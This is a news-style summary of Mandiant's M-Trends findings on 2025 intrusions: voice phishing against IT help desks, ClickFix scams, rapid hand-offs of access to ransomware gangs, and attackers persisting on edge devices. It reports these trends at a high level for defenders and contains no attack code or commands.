Smooth criminals talking their way into cloud environments, Google says
Summary
Google Cloud’s Mandiant reports that voice-based phishing surged in 2025, becoming the second-most common initial access vector overall and the top tactic used in cloud break-ins. Interactive social engineering — callers steering conversations in real time — has proven highly effective, particularly against IT help desks where attackers register devices for MFA or request password resets. The M-Trends analysis shows voice phishing accounted for about 11% of successful intrusions, while exploitation of vulnerabilities remained the most common vector at 32%. Traditional, non-interactive email phishing declined to around 6%.
The report also highlights two other worrying trends: a rise in ClickFix-style scams that trick users into running malicious commands, and extremes in attacker timelines. Some intrusions involve rapid hand-offs — access gained by one actor is passed to a ransomware or extortion group in under 30 seconds — while other campaigns show extreme stealth, with actors living on edge devices (firewalls, routers, VPNs) and remaining undetected for hundreds of days (investigations cited average dwell times up to ~393 days in some cases).
Key Points
- Voice phishing rose to 11% of initial access vectors in 2025 and is the top method for cloud environment break-ins.
- Exploiting vulnerabilities remains the leading initial access method (32%).
- Non-interactive phishing (emails) declined to about 6% of intrusions.
- Interactive social engineering targets IT help desks to register attacker devices for MFA or reset credentials.
- ClickFix attacks — tricking users into running harmful commands — spiked and were widely used by access-for-sale operations.
- Rapid ‘hand-offs’ can move access from initial intruder to ransomware gangs in under 30 seconds, demanding machine-speed responses.
- ‘Living on the edge’ sees attackers exploit edge devices to persist, intercept traffic and harvest credentials, producing dwell times measured in hundreds of days.
Context and relevance
This Mandiant/M-Trends insight matters because it shows a shift from mass, low-effort email campaigns to high-touch, interactive social engineering that targets human fallibility — especially help desks — and cloud admin workflows. It also underlines the growing importance of securing edge devices: when attackers compromise firewalls or VPNs they can remain invisible yet extract sensitive data or credentials without needing to move deeper into networks. For security teams, that means focusing on automated detection, stronger operational processes for help desks, and hardening edge infrastructure and MFA workflows.
Industry trends this ties into: wider use of social-engineering-as-a-service, rising commoditisation of initial access, and an ongoing arms race where defenders must respond at machine speed to seconds-long attack life cycles. The findings also reinforce the need for zero-trust controls, rigorous logging and telemetry, and proactive patching of edge devices.
Why should I read this?
Because if you think phishing is just sketchy emails you’re behind the curve. These are slick, live phone scams and clever ClickFix ruses that are getting people and cloud accounts opened for criminals. Read it to know where attackers are actually getting in so you can stop them before they hand access off to the ransom crew.
Author style
Punchy: this isn’t a dry trendline — it’s a wake-up call. If you run cloud infrastructure or a help desk, this analysis is directly relevant and worth digging into so you can tighten processes and automation now.